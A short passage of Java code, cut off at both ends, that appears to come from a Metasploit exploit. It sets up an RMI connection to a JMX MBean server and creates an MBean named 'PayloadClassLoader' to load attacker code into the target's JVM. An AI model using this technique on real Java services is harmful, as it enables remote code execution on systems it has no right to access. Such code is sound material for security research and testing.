RMIServerImpl impl = getRMIServerImpl();
impl.setMBeanServer(getMbeanServer());
RMIConnectionImpl connectionImpl = new RMIConnectionImpl(impl,
"metasploit", null, null, null);
connectionImpl.createMBean("PayloadClassLoader", null, null,
params, null, null);
} catch (Exception e) {
try {